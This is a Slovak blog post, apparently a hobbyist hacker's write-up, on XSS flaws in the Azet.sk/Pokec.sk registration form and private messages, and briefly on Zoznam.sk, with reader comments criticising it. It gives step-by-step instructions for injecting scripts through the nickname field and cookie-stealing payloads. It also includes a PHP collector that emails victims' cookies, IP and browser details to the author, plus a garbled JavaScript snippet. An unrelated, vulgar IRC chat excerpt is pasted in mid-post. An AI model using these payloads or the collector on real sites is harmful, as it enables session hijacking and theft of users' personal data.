WebSupport.sk
UnlimitedHosting
|
CustomHosting
|
FreeWeb.sk
Chyba, cez ktorú sa dalo dostať do systému spoločnosti Azet.sk a.s
Chyba sa skrývala v registračnom formulári: http://wap.pokec.sk/registracia.phtml
Táto chyba je už v dnešných dňoch odstránená.
Ako iste viete, registračný formulár majú rozdelený na 2 fázy:
v prvej si vyberiete nick a v druhej vyplníte ostatné údaje.
Chyba spočíva v tom, ako ste si všimli,
ja som použil tu najmenej zlú vec a to nick v tagu marquee, čo spôsobí pohybovanie
textu.
http://www.nesho.sk/plocha.jpg
http://www.nesho.sk/plocha2.jpg
Napadlo ma, ak sa dajú v mene, čiže nicku používať html tagy, tak určite by išlo aj
scripty, aj všeličo podobné. Ak by sa niekto zaregistroval pod nickom nejakého xss
scriptu <script>alert('xss')</script>ako som to spravil ja, mohol by bez najmenších problémov získať prístup do nickov, albumov a aj všetkého, čím a čo azet.sk ponúka. Tiež nie je problém túto chybu zneužiť proti užívateľom a ich osobným údajom <script>alert(document.cookie)</script> .
Postup získania prístupu & pohyblivé farebné nicky & scripty.
____________________________________
Zapneme si stránku http://wap.azet.sk/registracia.phtml . Dáme hocijaký neexistujúci
nick. Prejdeme na ďalší krok.
Tam si otvoríme zdrojový kód. Prepíšeme Nick na nick z html kódom & môžeme použiť aj čistý scipt, alebo na nick, ktorý existuje.
tu dame nick môžeme pridávať farbu.... scroll a pod.
http://www.nesho.sk/zaujimave.jpg
Pokračujeme - registrácia úspešne prebehla a môžeme sa prihlásiť.
____________________
Ak zadáme do tohto nami upraveného formulára <script>alert('xss')</script>, tak nás pod ním zaregistruje (teda zaregistrovalo) Teraz si dáme do vyhľadávania užívateľov <script>alert('xss')</script> alert na svete. Môžme tiež hore prepísať url adresu a za =dáme <script>alert('xss')</script>, čo spôsobí automatické odhlásenie. Prihlásime sa pod svojim nickom, ale uz v url a zdrojovom kóde bude xss chyba.
Už nie je problém ju zneužiť
Moj zdrojový už upravený kód je na stránke http://www.nesho.sk/registracia.html
V tomto prípade, aj keď som neveril, aj keď som tu chybu kúsok využil a bol som chvíľku block, že sa administrátori azet.sk a.s. zachovajú tak solídne, že ma odblokujú a chybu v systéme odstránia.
_____________ _________
_____________ _________
Nedalo mi musím sem dopísať aj ďalšie chyby, ktoré tento portál obsahoval, bola to chyba cez ktorú sme mohli odchytávať session, xss .... ako v predošlom prípade aj tu to bolo jednoduché. Keďže, to je už odstránené dopĺňam tento blog.
Chyba sa skrývala v rp správach.
http://www.nesho.sk/xssrp.jpg
ID užívateľa po zadaní <script>alert(document.cookie)</script>
vyskočilo okienko z vašimi cookie.
:po zadaní <script>alert('xss')</script>
vyskočilo okienko xss.
Keďže, mi nechceme aby sa zobrazilo cookie z našimi informáciami, vytvoríme si webovú stránku, alebo ak už máme na nejakom webovom serveri, upneme si tam náš script. Použijeme js script kt. môže vyzerať aj takto.
var web=document.cookie;
var cookie;
rozdel=web.split(";");
for(i=0;i<rozdel.length;i++){
cookie=cookie+separe[i];
}
var obsah='<iframe style="display:none;"
src="http://www.pokec.sk/index.php<script>alert(document.cookie)</script>">
</iframe>';
document.write(obsah);
môžeme použiť aj php script, ktorý môže vyzerať nasledovne
<?php
$cookie = $_GET['cookie'];
$ip = getenv("REMOTE_ADDR");
$ref = getenv("HTTP_REFERER");
$agent = getenv("HTTP_USER_AGENT");
$msg = "\nPage: $ref\nCookie: $cookie\nIP Address: $ip\nInfos: $agent";
$subject = "Cookie - $ref";
mail("admin@nesho.sk", $subject, $msg);
?>
Pekne nám chodia na e-mail cookie užívateľov.
Postupne budem odhaľovať v tomto blogu chyby viacerých webov, ale musia ich najprv. odstrániť.
_____________________Hacked by ZoXnam.sk______________
Objasním stručne presne ten istý systém až na to, že zoznam.sk má viac takých chybičiek, cez ktoré sa dá ovládnuť.
http://www.nesho.sk/xss%20zoznam.sk.jpg
Už vám pridávam aj xss zoznam.sk.
Táto chyba sa dá odstrániť obmedzením počtu znakov v nicku, zakázaním špeciálnych znakov.
_________
O týchto chybách (xss) si máte možnosť prehľadne prečítať aj na http://blog.synopsi.com/
<sixeR> KURVA
<sixeR> zaspal som na posteli, zaspal
<sixeR> a zobudil som sa tak, ze pod sebou vidim kaluz krvi, nadomnou otec
<sixeR> a rozjebay xicht
<kab-el> ??
<kab-el> ti rozbil ksicht ked zistil, ze si buzerant?
<sixeR> kabel ty kokot :D
<sixeR> ja tu mam ohrozenie zivota 3000, strata krvi
<sixeR> lahky otras mozgu pomaly
|
webhosting by:
WebSupport.sk
|
UnlimitedHosting | CustomHosting | FreeWeb.sk |
Comments
Re: Chyby v registračných formulároch + xss:
No dobre poviem ti to takto a naposledy. Bud zacnes pisat ako clovek a o veciach ktorym aspon trochu rozumies, alebo ... (domysli si).
P.S. na soom.cz tvoje háčkovacie umenie urcite ocenia, ale tu sme prilis slabi skilleri na to, aby sme dokazali chapat tvoju mongolcinu.
----------
tommyhot@hackingmachine:~$ microsoft &> /dev/null
Re: Chyby v registračných formulároch + xss:
JJ. Dám si pozor. Čo sa dalo som upravil + keď o nejaký čas pribudnú ďalšie bugy, budem sa snažiť, aby to bolo čo najlepšie sprostredkované.
Re: Chyby v registračných formulároch:
Updatol som to. A budem to dúfam updatovat aj naďalej.
Re: Chyby v registračných formulároch:
Hacker nesho este nam prosim ta vsetkym vysvetli, ako chces javascriptom (teda xss) dumpovat databazu?
----------
tommyhot@hackingmachine:~$ microsoft &> /dev/null
Re: Chyby v registračných formulároch:
No coment. Az tak daleko som nesmudlal.
Re: Chyby v registračných formulároch:
No vidis, tak potom nepis o veciach ktorym nerozumies ;) neber to ako utok, ale ako radu do zivota.
----------
tommyhot@hackingmachine:~$ microsoft &> /dev/null
Re: Chyby v registračných formulároch:
Trochu hlavu a patu by si tomu nechcel dat?
Ako iste viete, registračný formulár majú rozdelený na 2 fázy:
Akoze odkial by sme to mali vediet?
Chyba spočíva v tom, ako ste si všimli,
Nevsimli, teda aspon ja nie.
Chcel si tym celym povedat, ze maju neosetreny vstup vo formulari v policku kde sa zadava nickname? Trochu si mohol rozpisat zavaznost situacie, napr. - je to perzistentne xss? Kde vsade sa takyto nick potom vie (aj s html tagmi) zobrazit? Kedze sa jedna o wap stranky, je mozne vykonat nejaky skodlivy kod na niektorych druhoch telefonov? Skusil si overit, aky velky dopad ma neosetreny input, kde vsade je mozne to na danych strankach zneuzit?
Taketo informacie by citatelov bh myslim zaujimali viac. Alebo si ostal len pri alert('xss') a hura azet ma chybu?
Mno a este ta tvoja linka dava 404.
Neber to v zlom, ale myslim ze sa ten blog dal napisat aj o kusok putavejsi, zrozumitelnejsi a hlavne edukativnejsi (a.k.a. chyba tam ponaucenie pre deti).
Re: Chyby v registračných formulároch:
Akoze odkial by sme to mali vediet?
Akoze, zapnem si http://wap.pokec.sk/registracia.phtml a vidim.
Nevsimli, teda aspon ja nie...Mno a este ta tvoja linka dava 404.....
Stacilo, nevsimol aspon ja nie. http://www.nesho.sk/registracia.html , myslel som si, ze je to uz dlho zverejnene, ze to mozem dat dole. Uz je to spet.
Kde vsade sa takyto nick potom vie (aj s html tagmi) zobrazit?
Vsade, ale neslo mi o nick v html tagu, ale o scripty. Tie nicky boli len sranda. Daju sa vyuzit na skle, stym, ze clovek ktory ma tento nick a niekto druhy klikne na jeho profil ani neexistuje. Ak nieco napises na sklo s takym nickom tak napr. v IE bude lietat ten nick po skle. Vo firefoxe ho da pod riadok. To xss sa dalo vyuzit priamo na azete pod akymkolvek prihlasenim.
http://www.nesho.sk/plocha.jpg
http://www.nesho.sk/plocha2.jpg
je mozne vykonat nejaky skodlivy kod na niektorych druhoch telefonov?
Teoreticky aj prakticky by to bolo mozne, ale neskusal som to.
Skusil si overit, aky velky dopad ma neosetreny input, kde vsade je mozne to na danych strankach zneuzit?
Vsade kde to nemaju osetrene je to mozne zneuzit, ak sa jedna o mail na danom webe mozes sa dostat do kazdeho uzivatela, na pokeci si mohol otvorit aky kolvek album, ist na akykolvek nick, kedze po zmene kodu si si mohol vytvorit aj existuji ucet. Ale to sa dalo aj cez to xss.
Re: Chyby v registračných formulároch:
> (a.k.a. chyba tam ponaucenie pre deti).
A toto "a.k.a." ma aky zmysel? ;)
Re: Chyby v registračných formulároch:
A toto "a.k.a." ma aky zmysel? ;)
hento konkretne malo mat zmysel "inak povedane" (edukativnejsi <= ponaucenie)